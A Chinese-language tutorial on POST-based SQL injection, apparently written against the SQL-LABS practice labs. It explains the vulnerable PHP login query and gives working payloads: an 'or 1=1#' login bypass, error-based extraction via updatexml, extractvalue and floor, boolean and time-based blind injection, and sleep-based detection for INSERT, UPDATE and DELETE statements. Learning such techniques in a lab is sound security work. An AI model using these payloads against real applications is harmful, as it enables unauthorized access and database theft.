POST型注入产生的原因
- 在登录处,用于判断用户名、密码会使用
select
语句 - 在修改密码处,更新密码,会使用到
update
语句 - 在商城系统中,订单的添加,删除,可能会使用到
insert
,delete
语句
HTTP之POST请求
HTTP报文分为三部分,分别为请求行,请求头,请求体
- 请求行:由请求方法字段、URL字段和HTTP协议版本字段3个字段组成
- 请求头:由关键字/值对组成,每行一对,关键字和值用英文冒号“:”分隔。请求头部通知服务器有关于客户端请求的信息,典型请求头有
- user-agent
- Accept
- Host
- 空行: 用于通知服务器以下不会再有请求头
- 请求体: 请求数据不在GET方法中使用,而是在POST方法中使用。POST方法适用于需要客户填写表单的场合。与请求数据相关的最常使用的请求头是Content-Type和Content-Length。
POST型注入
登录是执行POST请求,与GET请求不同,传给服务器的值不会再URL中出现了,而是在请求体里,当服务器拿到请求体的数据,再执行SQL语句,查询是否存在用户输入的用户名和密码
关键php代码
@$sql = "SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
当用户填写用户名和密码就会执行此语句,用户名以及密码正确,sql
语句就会查询相应数据库,当能查询到,那么成功登陆,否则登陆失败
POST注入原理
传入参数,服务器解析参数之后,完整闭合SQL语句,构造万能密码成功登陆
SQL AND 和OR运算符
AND 和 OR 可在 WHERE 子语句中把两个或多个条件结合起来
如果第一个条件和第二个条件都成立,则 AND 运算符显示一条记录
如果第一个条件和第二个条件中只要有一个成立,则 OR 运算符显示一条记录
通过SQL的or
运算符,构造万能密码,判断是否为注入点
uname=admin' or 1=1#&passwd=12312 万能密码,判断是否为注入点
当服务器解析之后产生的SQL语句如下
SELECT username, password FROM users WHERE username='admin' or 1=1 #'and password='$passwd' LIMIT 0,1
其中#后面的都被注释掉了,执行的SQL语句就是
SELECT username, password FROM users WHERE username='admin' or 1=1
判断出注入点之后,就可以利用基于时间的注入,布尔注入,报错注入等,获得我们想要的相关信息
三种特殊注入
- INSERT
- UPDATE
- DELETE
创建HACK表,字段有id,name,age
SQL语句
INSERT INTO HACK VALUES(1,2,3);
UPDATE HACK SET NAME = 'GUEST' WHERE id = 1;
DELETE FROM HACK WHERE id = 2;
检测方法
DELETE 语句的控制点只有id,是int型,一般使用延时注入的方法判断是否存在注入
DELETE FROM HACK WHERE id = 13 and if(1=1,sleep(5),0);
UPDATE 语句与insert类似,可以使用下面的方法一,方法二来判断注入
方法一
-
检测
int
型数据会失效,因为int
型数据的插入不需要单引号来包裹- 在数据提交点,插入单引号,如果数据插入失败,那么80%是注入,20%是拦截
INSERT INTO 表名(col1,col2,col3) VALUES('a','b','c'); -- 一般程序中的insert语句中的values都是用单引号包裹起来的,int型不需要,所以插入单引号时会影响语句闭合,因此插入失败 -- 示例语句 INSERT INTO hack(id,name,age) VALUES(1,''',11);
- 在数据提交点,插入双引号正常插入,这时候90%确定是注入点
-- 插入双引号不会影响语句闭合 INSERT INTO hack(id,name,age) VALUES(2,'"',11);
- 在数据提交点插入
\'
正常插入,百分之百是注入点
-- \' 是对'转义,转义后的单引号不会影响语句的闭合,因此插入成功 INSERT INTO hack(id,name,age) VALUES(4,'\'',12);
方法二
通过基于时间的注入,判断响应时间
-
sleep(x)
-
‘or sleep(x) or’
-
int
型没有单引号包裹,可以直接使用sleep(x)来判断,如果延时x秒,那么存在注入
INSERT INTO hack(id,name,age) VALUES(sleep(2),'aaron',11);
String
型,有单引号包裹,首先闭合单引号,然后用sleep(x)判断
INSERT INTO hack(id,name,age) VALUES(11,''or sleep(2) or'',11);
注入测试
基于SQL-LABS-LAB11,使用万能密码判断存在注入点
- 报错注入
在执行SQL语句的时候,or关键字将前后两个条件结合起来查询,只要在or后面构造报错语句,updatexml,extractvalue,floor
,则可以使用报错注入
报错注入,前提是需要
echo mysql_error();
updatexml
报错注入
uname=admin' or updatexml(1,concat(0x23,database()),1)#&passwd=12312
extractvalue
报错注入
uname=admin' or extractvalue(1,concat(0x23,(select group_concat(table_name) from information_schema.tables where table_schema = database())))#
&passwd=12312
FLOOR 报错
uname=admin' or (select 1 from (select count(*),concat(0x23,(select table_name from information_schema.tables where table_schema = database() limit 0,1),0x23,floor(rand(0)*2)) as y from information_schema.columns group by y) as x)#
&passwd=12312
- 布尔注入
uname=admin' and ascii(substr(database(),§9§,1))#&passwd=12312
uname=admin' and ascii(substr(database(),§9§,1))=§22§#&passwd=12312
- 基于时间注入
uname=admin' and if(ascii(substr(database(),§1§,1)),sleep(2),1)#&passwd=12312
uname=admin' and if(ascii(substr(database(),§1§,1)) = §1§,sleep(2),1)#&passwd=12312
Update 注入
SQL-LABS-LESS17
Update SQL语句如下
UPDATE users SET password = 'aaron3' WHERE username='aaron'
当前存在两个注入点,一个在passwd
处,一个在username
处,首先在username处闭合单引号来实现注入
uname=aaron'#&passwd=123412
发现’被转义了,所以在username处无法注入
所以在passwd
处添加’ 然后闭合单引号来实现注入
上图可知,passwd
处存在注入
update如果where条件为假,那么将不会执行更改,在页面上,看不出来是否执行注入语句,因为只要执行了update,就会出现successfully updated字段,所以布尔注入在此页面不能使用,那么采用时间注入,报错注入来获取字段
- 报错注入
updatexml
extractValue
floor
- 基于时间注入
基于时间注入配合布尔盲注,来完成爆相应的字段